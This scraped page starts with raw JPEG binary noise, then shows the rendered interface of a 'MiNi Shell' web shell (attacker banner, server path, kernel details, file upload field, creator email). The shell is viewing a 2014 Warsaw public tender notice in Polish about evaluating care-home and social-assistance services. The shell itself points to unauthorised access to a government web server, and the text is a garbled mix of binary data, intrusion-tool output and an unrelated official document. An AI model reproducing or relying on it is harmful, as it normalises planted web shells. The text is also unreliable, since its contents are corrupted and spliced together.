JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141222/416618-N-2014.html

<p class="kh_header"><b>Warszawa: Ocena jakości usług świadczonych w m.st. Warszawa przez warszawskie domy pomocy społecznej oraz ocena jakości usług opiekuńczych świadczonych przez warszawskie ośrodki pomocy społecznej, a także identyfikacja i opis dobrych praktyk oraz opracowanie propozycji standardów tych usług</b><br>
<b>Numer ogłoszenia: 416618 - 2014; data zamieszczenia: 22.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa , Pl. Bankowy 3/5, 00-950 Warszawa, woj. mazowieckie, tel. (+48 22) 443 14 00, faks (+48 22) 443 14 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ocena jakości usług świadczonych w m.st. Warszawa przez warszawskie domy pomocy społecznej oraz ocena jakości usług opiekuńczych świadczonych przez warszawskie ośrodki pomocy społecznej, a także identyfikacja i opis dobrych praktyk oraz opracowanie propozycji standardów tych usług.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Ocena jakości usług świadczonych w m.st. Warszawa przez wskazane przez Zamawiającego warszawskie domy pomocy społecznej, a także identyfikacja i opis dobrych praktyk występujących w badanych placówkach oraz opracowanie propozycji standardów wybranych usług świadczonych przez warszawskie domy pomocy społecznej.
2. Ocena jakości usług opiekuńczych świadczonych w m.st. Warszawa przez warszawskie ośrodki pomocy społecznej oraz opracowanie propozycji standardów tych usług.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.32.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I
wykażą, że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali łącznie co najmniej 3 badania społeczne, w tym:
a)	co najmniej 2 badania jakościowe zrealizowane techniką indywidualnych wywiadów pogłębionych (IDI). Liczba przeprowadzonych wywiadów IDI w ramach każdego z badań nie może być mniejsza niż 5;
b)	co najmniej 1 badanie jakościowe zrealizowane wśród osób w wieku 50 lat i więcej 
techniką indywidualnych wywiadów pogłębionych IDI lub techniką zogniskowanych wywiadów grupowych (FGI). Liczba przeprowadzonych wywiadów IDI lub FGI z osobami 
w wieku 50 lat i więcej nie może być mniejsza niż 3.

CZĘŚĆ II
wykażą, że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali łącznie co najmniej 3 badania społeczne, w tym:
a)	co najmniej 2 badania jakościowe zrealizowane techniką indywidualnych wywiadów pogłębionych (IDI). Liczba przeprowadzonych wywiadów IDI w ramach każdego z badań nie może być mniejsza niż 5;
b)	co najmniej 1 badanie jakościowe zrealizowane techniką zogniskowanych wywiadów grupowych (FGI). Liczba przeprowadzonych wywiadów FGI w ramach badania nie może być mniejsza niż 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I 
wykażą, że dysponują co najmniej czteroosobowym zespołem badawczym, w którego skład wejdą następujące osoby: 
a) kierownik zespołu badawczego, który: 
- posiada wyższe wykształcenie; 
- w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, kierował pracami w ramach co najmniej 3 projektów badawczych o tematyce społecznej realizowanych z wykorzystaniem metod jakościowych, np. analiza dokumentów zastanych, indywidualne wywiady pogłębione (IDI), zogniskowane wywiady grupowe (FGI) itp.;
 - jest autorem lub współautorem minimum 3 raportów badawczych (tj. dokumentów lub opracowań, opisujących rezultaty badań i analiz, przygotowanych dla podmiotu zlecającego badanie) z projektów badawczych o tematyce społecznej, w których wykorzystywane były jakościowe metody badań, np. analiza dokumentów zastanych, indywidualne wywiady pogłębione (IDI), zogniskowane wywiady grupowe (FGI) itp. 
b) co najmniej jeden badacz jakościowy, który: 
- posiada wyższe wykształcenie; 
- posiada co najmniej 3-letnie doświadczenie w prowadzeniu indywidualnych wywiadów pogłębionych (IDI); 
- w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, był odpowiedzialny za prowadzenie (moderowanie) indywidualnych wywiadów pogłębionych (IDI) lub zogniskowanych wywiadów grupowych (FGI) oraz przygotowanie scenariuszy wywiadów IDI lub FGI i interpretację danych pochodzących z tych wywiadów w ramach co najmniej 2 projektów badawczych o tematyce społecznej, przy czym w każdym ze wskazanych projektów przeprowadził co najmniej 5 wywiadów IDI lub FGI;
 - jest autorem lub współautorem minimum 2 raportów badawczych (tj. dokumentów lub opracowań, opisujących rezultaty badań i analiz, przygotowanych dla podmiotu zlecającego badanie) z projektów badawczych o tematyce społecznej, w których wykorzystywane były jakościowe metody badań, np. analiza dokumentów zastanych, indywidualne wywiady pogłębione (IDI), zogniskowane wywiady grupowe (FGI) itp. 
c) co najmniej jeden badacz jakościowy ds. ewaluacji projektów, programów społecznych, który: 
- posiada wyższe wykształcenie;
 - posiada co najmniej 3-letnie doświadczenie w prowadzeniu ewaluacji projektów, programów społecznych; 
- w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, przeprowadził minimum 2 ewaluacje projektów, programów społecznych, w których był odpowiedzialny za analizę dokumentów zastanych oraz prowadzenie indywidualnych wywiadów pogłębionych (IDI) lub zogniskowanych wywiadów grupowych (FGI)
 - jest autorem lub współautorem co najmniej 2 raportów ewaluacyjnych o tematyce społecznej, tj. dokumentów lub opracowań, opisujących rezultaty przeprowadzonych ewaluacji, przygotowanych dla podmiotu zlecającego badanie. 
d) co najmniej jeden badacz jakościowy ds. obserwacji etnograficznych, który: 
- posiada wyższe wykształcenie; 
- w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, był odpowiedzialny za przeprowadzenie co najmniej 2 obserwacji etnograficznych realizowanych w ramach dwóch rożnych projektów badawczych o tematyce społecznej oraz interpretację danych pochodzących z tych obserwacji;
- jest autorem lub współautorem minimum 2 raportów badawczych (tj. dokumentów lub opracowań, opisujących rezultaty badań i analiz, przygotowanych dla podmiotu zlecającego badanie) z projektów badawczych o tematyce społecznej, w których wykorzystywane były jakościowe metody badań, np. analiza dokumentów zastanych, indywidualne wywiady pogłębione (IDI), zogniskowane wywiady grupowe (FGI), obserwacje etnograficzne itp.
 e) dodatkowe wymagania, tj. doświadczenie w prowadzeniu warsztatów: co najmniej 2 ze wskazanych powyżej członków zespołu badawczego musi wykazać, że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie przeprowadziło po co najmniej 2 warsztaty. 
Uwaga: W każdej części zamówienia Wykonawca musi wykazać się innym zespołem badawczym 
CZĘŚĆ II 
wykażą, że dysponują co najmniej trzyosobowym zespołem badawczym, w którego skład wejdą następujące osoby: 
a) kierownik zespołu badawczego, który: 
- posiada wyższe wykształcenie; 
- w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, kierował pracami w ramach co najmniej 3 projektów badawczych o tematyce społecznej realizowanych z wykorzystaniem metod jakościowych; 
- jest autorem lub współautorem minimum 3 raportów badawczych (tj. dokumentów lub opracowań, opisujących rezultaty badań i analiz, przygotowanych dla podmiotu zlecającego badanie) z projektów badawczych o tematyce społecznej, w których wykorzystywane były jakościowe metody badań, np. analiza dokumentów zastanych, indywidualne wywiady pogłębione (IDI), zogniskowane wywiady grupowe (FGI) itp. 
b) co najmniej jeden badacz jakościowy, który:
 - posiada wyższe wykształcenie;
 - posiada co najmniej 3-letnie doświadczenie w prowadzeniu zogniskowanych wywiadów grupowych (FGI);
 - w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, był odpowiedzialny za prowadzenie (moderowanie) indywidualnych wywiadów pogłębionych (IDI) lub zogniskowanych wywiadów grupowych (FGI) oraz przygotowanie scenariuszy wywiadów IDI lub FGI i interpretację danych pochodzących z tych wywiadów w ramach co najmniej 2 projektów badawczych o tematyce społecznej, przy czym w każdym ze wskazanych projektów przeprowadził co najmniej 5 wywiadów IDI lub FGI;
 - jest autorem lub współautorem minimum 2 raportów badawczych (tj. dokumentów lub opracowań, opisujących rezultaty badań i analiz, przygotowanych dla podmiotu zlecającego badanie) z projektów badawczych o tematyce społecznej, w których wykorzystywane były jakościowe metody badań, np. analiza dokumentów zastanych, indywidualne wywiady pogłębione (IDI), zogniskowane wywiady grupowe (FGI) itp.
 c) co najmniej jeden badacz jakościowy ds. obserwacji etnograficznych, który: 
- posiada wyższe wykształcenie; 
- w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, był odpowiedzialny za przeprowadzenie 2 obserwacji etnograficznych realizowanych w ramach dwóch rożnych projektów badawczych o tematyce społecznej oraz interpretację danych pochodzących z tych obserwacji; 
- jest autorem lub współautorem minimum 2 raportów badawczych (tj. dokumentów lub opracowań, opisujących rezultaty badań i analiz, przygotowanych dla podmiotu zlecającego badanie) z projektów badawczych o tematyce społecznej, w których wykorzystywane były jakościowe metody badań, np. analiza dokumentów zastanych, indywidualne wywiady pogłębione (IDI), zogniskowane wywiady grupowe (FGI), obserwacje etnograficzne itp.                                                                                   

Uwaga: W każdej części zamówienia Wykonawca musi wykazać się innym zespołem badawczym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) dokument (np. pełnomocnictwo, odpis z właściwego rejestru, np. Krajowego Rejestru Sądowego, informacja o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczypospolitej Polskiej lub umowa spółki cywilnej, itp.) potwierdzający, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do oferty; 
b) jeżeli wykonawca nie należy do grupy kapitałowej składa taką informację - wg wzoru określonego w załączniku do SIWZ; 
c) oryginał pisemnego zobowiązania podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków;
d) Wykonawca zagraniczny składa dokumenty zgodnie z zapisami pkt sekcji III (12 i 13 SIWZ), a w szczególności zgodnie z zapisem pkt III.6) lit. a) ze szczególnym uwzględnieniem, aby dokumenty złożone wraz z ofertą potwierdzały, iż oferta została podpisana przez osobę/y uprawnioną do reprezentacji Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - dodatkowe indywidualne wywiady pogłębione IDI wśród ekspertów ds zarządzania usługami pomocy społ./usługami opiekuńczymi/pracą socjalną - 15</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej Umowy w stosunku do treści oferty Wykonawcy jest możliwa w następującym zakresie: 
1)	zmiany terminu czynności opisanych w Umowie w tym także  Harmonogramie badania będące następstwem okoliczności nie wynikających z winy Wykonawcy; 
2)	zmiany kryteriów rekrutacji respondentów będące następstwem okoliczności nie wynikających z winy Wykonawcy; 
3)	zmiany liczby wykonanych zdjęć będące następstwem okoliczności nie wynikających z winy Wykonawcy, np. brak oświadczenia o zgodzie na publikację wizerunku; 
4)	zmiany metod i technik badawczych będące następstwem okoliczności nie wynikających z winy Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ogloszeniabzp.um.warszawa.pl/wyszukiwarka.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu m.st. Warszawy, ul. Senatorska 36, 00-095 Warszawa, p. 13, piętro IV..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2015 godzina 11:00, miejsce: Biuro Zamówień Publicznych Urzędu m.st. Warszawy, ul. Senatorska 36, 00-095 Warszawa, p. 13, piętro IV..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin otwarcia ofert 12.01.2015 r. godz. 11:30 Biuro Zamówień Publicznych Urzędu m.st. Warszawy, ul. Senatorska 36, 00-095 Warszawa, sala 16, piętro IV.
 2. Osobami uprawnionymi do kontaktu z Wykonawcami są:
- w sprawach formalno-prawnych:
 Pani Jolanta Kotowicz - główny specjalista w Biurze Zamówień Publicznych, tel.: 22/443-14-13;
- w sprawach merytorycznych: 
 Pan  Lech Uliasz - podinspektor w Biurze Pomocy i Projektów Społecznych, tel. 22/443-02-73.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ocena jakości usług świadczonych w m.st. Warszawa przez wskazane przez Zamawiającego warszawskie domy pomocy społecznej, a także identyfikacja i opis dobrych praktyk występujących w badanych placówkach oraz opracowanie propozycji standardów wybranych usług świadczonych przez warszawskie domy pomocy społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ocena jakości usług świadczonych w m.st. Warszawa przez wskazane przez Zamawiającego warszawskie domy pomocy społecznej, a także identyfikacja i opis dobrych praktyk występujących w badanych placówkach oraz opracowanie propozycji standardów wybranych usług świadczonych przez warszawskie domy pomocy społecznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.32.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. dodatkowe indywidualne wywiady pogłębione IDI wśród ekspertów ds zarządzania usługami pomocy społ./usługami opiekuńczymi/pracą socjalną - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ocena jakości usług opiekuńczych świadczonych w m.st. Warszawa przez warszawskie ośrodki pomocy społecznej oraz opracowanie propozycji standardów tych usług.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ocena jakości usług opiekuńczych świadczonych w m.st. Warszawa przez warszawskie ośrodki pomocy społecznej oraz opracowanie propozycji standardów tych usług.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.32.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. dodatkowe indywidualne wywiady pogłębione (IDI) wśród ekspertów ds. zarządzania usługami pomocy społ./usługami opiekuńczymi/pracą socjalną - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com